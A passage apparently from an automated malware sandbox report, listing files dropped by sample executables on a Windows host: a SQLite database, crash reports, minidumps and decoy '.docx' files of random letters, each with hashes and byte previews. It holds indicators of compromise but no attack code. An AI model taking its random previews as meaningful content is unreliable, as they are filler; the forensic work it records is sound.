                                                                                                                                                                                                                                                                                      Preview:GRXZDKKVDBUGJWVAVQNLKHTVWJFMWUAIFGXJYDZTDDYOZYAHDDDHNXHNVSFVZJEMKSJXGDABHWXKQZCQXBMLFZCFZRGZPZWYYNETLMDWOLDLPIFOVKRDMQEWUEHKITHNGNRTRZWQHFMBDECTTQKFDEVNVHBAPCNMCJNWWITPVACWBIUNPCYFZKGJXCMBWDNHDCVDCGEKHYPPPEGKPCPMYZEKRCOGRHDFANVZFDZEKZWOKLRIOUPCTJCKQPECVEEGNTLJWZOKHSKZRNLJEDQLEQNRWIYLSXHSNVGFTCDJOFJSSGANZFCFSTDUPYBCCAPQWVVVHWQMAMBVDQNABQSQOSDYDMOVPXENCAXSTPDCENIQOWPCOQHPSISEOWFKMBLGAZRALPTAYHDZLKJTCHXGTPXNIVUMCOJRZXPUVUFPCWEAEZMMLATLTGHPJIMHWFBUWIATNBBPFGVFXNULJLRYLAGRNCKVAJADSLQGVLGIYOHDIWUERAQSCTFBMXCMLCXSHZGTWPBCVHUYPVAFSBZNBGAGMHGULJYULEEHPGNBGEQRAOPBXXMZIUIPJMFAOVNMZZTOZGOZOJPKWCEFTTAVUBAADATZYJDWSZEZPLDTGYCYWTSDQTIMZHCKMQLZFEYSYUUWFJSYEFNDDKQMZVTBOZLQBDKFHMMKIYQPFKZLTSHIJVNPHPCTWBWPTTKDHDZEMDVWXXBLPWLCSSBMTLIVOVYOKQCJKTYJWGJUBQUGQVBYJQQLLGTHWSPFLDMDWBTOQUISHXBCHIJKAJFIPBNKMWVQGUSJVNKXAXFDNOBYJXMWRDAZWUJSRMMFQXDPYYKOFBEROBQMDZHDZZHOEIOKDOCHQQDQQRHOROOIFAGQEJZJFZIGPJIRWVNQYZAJAHAWIEFFNXLXQWIUWYSGZDFYPCCGWYBBFQQMSMJBRIUPFBWIHWJWVCYOBNNXKIIWTIXOWRVLFBGPGWFQTGPUNWKWUUMQXIKNCLTTGYHBMKXJ

                                                                                                                                                                                                                                                                                      C:\ProgramData\HDGCGHIJKEGIECBFCBAECGIEBK

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):5242880
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.03859996294213402
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
                                                                                                                                                                                                                                                                                      MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
                                                                                                                                                                                                                                                                                      SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
                                                                                                                                                                                                                                                                                      SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
                                                                                                                                                                                                                                                                                      SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_4BfhCycV4B.exe_efbe2ea1df186f15b396e081ebab3a86d1acd744_4892bd79_389c1736-85f1-40e3-b174-145367d5ec86\Report.wer

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0222455013532195
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:96:rOFWQCMs0YqR+qq8fHQXIDcQUJc6UhcEIcw3G+HbHg/opAnQr39DDWpsOyP9Qxv4:yhCM7c70c+SbjSJ8JkzuiF3Z24IO8L
                                                                                                                                                                                                                                                                                      MD5:74795F1DD39336C8ECB6D12F6BCDA123
                                                                                                                                                                                                                                                                                      SHA1:90B5F46AFF31530060C512563199347D69D83EA4
                                                                                                                                                                                                                                                                                      SHA-256:1A60CEC518971A58F2AE55989A692295D1AB56BF4C431645E60FAC4DC119E1CF
                                                                                                                                                                                                                                                                                      SHA-512:41A95CEE1FF8929E7401E1902AEAF53AB67271527C1F5EC6622D5978E34A5B859799C1309F46BF4E3FD3DA0C0F27194DE421E13D9800E0BEFA225F57C32F8E26
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.3.3.0.9.0.1.5.6.0.2.4.8.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.3.3.0.9.0.2.3.7.2.7.5.1.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.8.9.c.1.7.3.6.-.8.5.f.1.-.4.0.e.3.-.b.1.7.4.-.1.4.5.3.6.7.d.5.e.c.8.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.8.3.c.4.f.f.5.-.6.c.8.4.-.4.5.b.3.-.a.2.1.b.-.5.5.5.c.8.f.6.5.1.a.7.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.4.B.f.h.C.y.c.V.4.B...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.1.c.-.0.0.0.1.-.0.0.1.4.-.f.2.d.1.-.2.5.c.2.4.f.9.5.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.3.2.d.5.f.a.7.1.8.3.2.d.b.9.b.8.7.f.e.0.b.0.b.4.a.2.c.5.1.0.f.e.0.0.0.0.0.a.1.6.!.0.0.0.0.0.7.b.9.0.b.6.9.d.3.7.f.c.e.e.d.0.e.0.1.a.9.e.a.b.1.0.9.e.6.2.6.5.2.d.9.c.3.9.d.!.4.B.f.h.C.y.c.V.4.B...e.x.e.....T.a.r.g.e.t.A.p.p.

                                                                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_u3z0.0.exe_2a63b4411af5b91984e3ab9b70e5a8cf4198c2f_16d0516e_412c9ff8-0d4e-400a-8d3e-5265efddec06\Report.wer

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0541327276720027
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:wIhFGMo08l3bjSXZrMZm9bzuiF3Z24IO8R:9hFGMD8l3bj78bzuiF3Y4IO8R
                                                                                                                                                                                                                                                                                      MD5:DC8842CDB2C44CDE6F2FC71AB101AA94
                                                                                                                                                                                                                                                                                      SHA1:C12256C8E451813185B5A88E2E68757BC54D142E
                                                                                                                                                                                                                                                                                      SHA-256:61474D228E10796F4101E36A76DE2A6D0331847B4C5E7948661C6A39239710A0
                                                                                                                                                                                                                                                                                      SHA-512:401AC0967AB56AA775842841EFE0B1FF325E2C92AD0E9029BA9556B3DDFAA8658ACDF5D63344695739BC26E568D8742EE15E613CF58CC858C8EB5DDC74EA3FBE
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.3.3.0.9.1.1.6.8.4.8.3.6.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.3.3.0.9.1.2.7.9.4.1.9.8.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.1.2.c.9.f.f.8.-.0.d.4.e.-.4.0.0.a.-.8.d.3.e.-.5.2.6.5.e.f.d.d.e.c.0.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.5.f.0.d.f.a.7.-.1.7.f.4.-.4.5.4.3.-.8.3.b.2.-.1.2.4.7.4.5.5.6.4.5.5.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.u.3.z.0...0...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.9.c.-.0.0.0.1.-.0.0.1.4.-.7.e.c.b.-.9.a.c.4.4.f.9.5.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.c.3.e.1.e.b.3.5.8.8.a.f.5.0.f.2.6.c.a.8.e.a.8.2.1.b.0.a.8.4.0.0.0.0.0.0.a.1.6.!.0.0.0.0.b.e.3.9.d.0.7.7.0.4.e.f.b.3.5.b.d.1.5.0.3.b.3.9.1.4.c.6.d.d.6.c.9.e.6.3.1.2.e.8.!.u.3.z.0...0...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4.

                                                                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER3F11.tmp.dmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                      File Type:Mini DuMP crash report, 15 streams, Tue Apr 23 07:28:21 2024, 0x1205a4 type
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):45781
                                                                                                                                                                                                                                                                                      Entropy (8bit):2.8880335831658988
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:384:lgqwSc6xFnDO1CH5IH2Ltgz+XR/2LhcN0OvuLznO:qnv6xFnDO1awotg1lWH2PO
                                                                                                                                                                                                                                                                                      MD5:7E03D6E10FB3F78C5CC2380B0A844751
                                                                                                                                                                                                                                                                                      SHA1:8DA9723228B660F52A8F984EA4E7A18B9EA6583D
                                                                                                                                                                                                                                                                                      SHA-256:998969C7E4F14AC76175291A77D74458DE9A831A6A1C59CC7C4A3F2BEAE5F036
                                                                                                                                                                                                                                                                                      SHA-512:43A1C0B4A9963931036648A4C9A0F69C84441756DD9CE4EB28A3E428023FB43F1971F55BD26CAF00B16D977B48F0CE7D1D3ED4AC597E286BDE1D11E5177F2BD2
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:MDMP..a..... ........c'f............4...............H............!......D...l6..........`.......8...........T...........X5..}}...........#...........%..............................................................................eJ......h&......GenuineIntel............T............b'f.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER402C.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):8338
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.6968904447513213
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:R6l7wVeJoU6/N6YEITSU76gmfa/VpDu89bd8sfwfm:R6lXJz6l6YEMSU76gmfa/ndPfV
                                                                                                                                                                                                                                                                                      MD5:98A08FDEE8A8028D0F30AE1C036DF5AE
                                                                                                                                                                                                                                                                                      SHA1:7812E974E6EE128C3AA2907D1350B9675AA9BF66
                                                                                                                                                                                                                                                                                      SHA-256:766A271AEA89033E7E8634CA1A7A7F4B989EB34E2F5480AC89B71F39E6A197B3
                                                                                                                                                                                                                                                                                      SHA-512:0B0368A319F9929966DA8640B8F6BD380F8DA007C742CBAEC2A3BEE72F1A544958CA4988715B5A301119B1FDA9C412AA134F55222002ABD964FC9E12262072B4
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.1.4.8.<./.P.i.

                                                                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER408A.tmp.xml

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):4583
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.471548521880386
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:cvIwWl8zszJg77aI9alWpW8VYoYm8M4JRkBmhFd+q8KC6c582uoued:uIjfNI7QU7VoJHo5CFed
                                                                                                                                                                                                                                                                                      MD5:E4F22C61D5F40BDFC706A2639E88E199
                                                                                                                                                                                                                                                                                      SHA1:8980E943CCF66A276EF2D9871AA649A312A15828
                                                                                                                                                                                                                                                                                      SHA-256:D4838CC644CBE586741E7A51E3EC3CAE59B7D6B4DB1BDC484123C519F1B502F8
                                                                                                                                                                                                                                                                                      SHA-512:0DECD008138C29B461734CD581F7D2AE91DF83F5283620DAF6B6EA842690DE1DF1654A0F15209E2CACFFFCC9D478F7DE3EEFF7A18BA963AA773B60D788CCA507
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="292231" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER667F.tmp.dmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                      File Type:Mini DuMP crash report, 14 streams, Tue Apr 23 07:28:31 2024, 0x1205a4 type
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):56794
                                                                                                                                                                                                                                                                                      Entropy (8bit):2.6571116089227007
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:384:dDhuwut0wnEEdFX8uBJSamullUny3DP4l1Q:ywMJnEE/BgaNUy8l1Q
                                                                                                                                                                                                                                                                                      MD5:C345120B2504B60501B6034FEA214DA0
                                                                                                                                                                                                                                                                                      SHA1:D1CC110B653CAEFCB6F53124DA95D3FA8A0BAB99
                                                                                                                                                                                                                                                                                      SHA-256:924E075F726D04A13A1A059583866FC6D9F0234FDC940B375B4996EA7AA656F3
                                                                                                                                                                                                                                                                                      SHA-512:916D6F4BE3CC1FDBE9507D828DE54B0059B1F4E0CFFE32565201DBBC2FA15EE491A3B22B093125D4052D7C7A337619545676FDDE9BAEC50718A69A093A696B8E
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:MDMP..a..... ........c'f............4...........p...<.......t...22..........T.......8...........T...........XS..............."...........$..............................................................................eJ......0%......GenuineIntel............T............b'f.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER6836.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):8324
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.6947124822695248
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:R6l7wVeJeZ6926YYKo6PvgmfSBFpD/89b3rsfL9m:R6lXJ46926Y7o6ngmfS23wfc
                                                                                                                                                                                                                                                                                      MD5:F1387E98E1D0A576EB1FC93A9456D6C0
                                                                                                                                                                                                                                                                                      SHA1:C9C5B3E266D388BA4E69A5F9260F12E870E568D7
                                                                                                                                                                                                                                                                                      SHA-256:95E9B897EE8B31B980AC4FB75327A5C163EB9D5600FE96DE9512327E52C7D05C
                                                                                                                                                                                                                                                                                      SHA-512:ACF6E660327474B1BE798C7ACBC13B4151252C1E14D46F89B74DAE7AB5D1D9FD7018C7394320FDDDA4144F3C27BF0D97759D33C72606D19288E919CE6924DD95
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.3.0.0.<./.P.i.

                                                                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER68D3.tmp.xml

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):4555
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.440171802854924
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:cvIwWl8zszJg77aI9alWpW8VY9Ym8M4JEm5UFP+q83wTj4ozpId:uIjfNI7QU7VhJOXzpId
                                                                                                                                                                                                                                                                                      MD5:B6DB3B4F6630293AB3C2E0712F02858B
                                                                                                                                                                                                                                                                                      SHA1:EE273179FC07AA806D01C333B45D16D66B05C0B4
                                                                                                                                                                                                                                                                                      SHA-256:1BA74EBE77FF18C5DE9C5380DCE1C496ED9F5767297976E8B70ADF60207FC01D
                                                                                                                                                                                                                                                                                      SHA-512:B549C7FD401C958DB695C54F09AD693F90204941091B7B5D7076ECAE3A86CD83801189752518080F6B97B0C100CE150BFAC93F95225D68429ACCBEBADDDD158A
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="292231" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                                                                                      C:\ProgramData\NVWZAPQSQL.docx

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1026
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.6998645060098685
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                                                                                                                                                                                                                                                                                      MD5:1676F91570425F6566A5746BC8E8427E
                                                                                                                                                                                                                                                                                      SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                                                                                                                                                                                                                                                                                      SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                                                                                                                                                                                                                                                                                      SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:NVWZAPQSQLDLCZFLTMOWSKLFWOMMGYWWTZSPFFTDRHOTSSRKDGSJCIGMJJNKHMSAEMKBPGYCFVANNLUHHUMQOHINWJABNFIWWWZXJLCANQSKWMIWKPMVTCWFUMQBAGWZRWHRCMJDSNPGGGNECNQGPIZXLBIMLXMHDDXDKVYPEKRCNITDGJJNAEAATOVDDPBUDYWRPDYWARJTFXBUUZABBVURIWKONIVMPCYVUBTOTCIJJVRWYUNYHAFJZUMVTOIXZGAVVNSRENTVPHFLSLFWBLPFQDMQCJIHRXSQOTPSPDZKXCRBHZXDQIECBJTNIRGCACNADPHRWIVAWGPANEMHGPPPARWYWAOAHPWQLEGOBGVNWVBIFLAEOZYELRFOEZQCQIXCQBUKZGPOQFLHFLCFTYWBDGCWMDWICTICWVZEAQNJOOVCGQZYTBBXQPEYFQMSMETMKKZMRGXXLCDXDEEEJKZAUNEWZONYMVVIZOWQRUQYNOEFMWEVWXFAZRHGHUXGAYODAXDNQONZPVBKRYIOLZJIYSHJSCEPYVMYISKJIWPKVGUQBNLZCUFGXBFZDDRGUMCLJGJPDAZKZLRMDSBFEJQYNNKTHBMJMUHVUOIVZRULJFFYIUMOHUGCJUYZGXKXNIWZUKRIYDZATEOXGMHUPOOBIHEEVPKQEZDDWJHKEKLNTMWMDCFDOYCCDOERYFZNFUDEHYXIBQAVVOHQNIEWZODOFZDFJSWYCJMWWOIZSCZSZBGOIFHRDBXHKMCCLSYNVVXYLWKXEKVHIZEBIBHWMXDXEGZDYWRROMYHTDQVCLXOGVHWHFNIDZOXWTTPAMAKJIYLNQIEDSCCTSBLPHTTGLCIYXXWIBXAGYBACOKOTPPBKACWQBYRTKFMCSSRYQNESLPTLSLCWCSLHOGHNCGUFWMYXDBUFSOKFIDUIBHTQJFIQTVZZVIZEWTBSHJWKQXGUWLFKNDUSKPDSMJNJJNEEOWEHOKTNZWRDNOXWJEK

                                                                                                                                                                                                                                                                                      C:\ProgramData\NWCXBPIUYI.docx

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1026
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.696724055101702
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:amL3nXTtZkQxqip7hViX2Zka12//5V9PP+Iw5ZrfqoV2P8S7FpwmKxlTn:xXL4ivV62qaI/xVhVWZ+X8SxKDT
                                                                                                                                                                                                                                                                                      MD5:1FFF6A639C738561CDC01BD436BA77C1
                                                                                                                                                                                                                                                                                      SHA1:BAFB1D68D43B177330F701BA01CA1AD19CB4FBB8
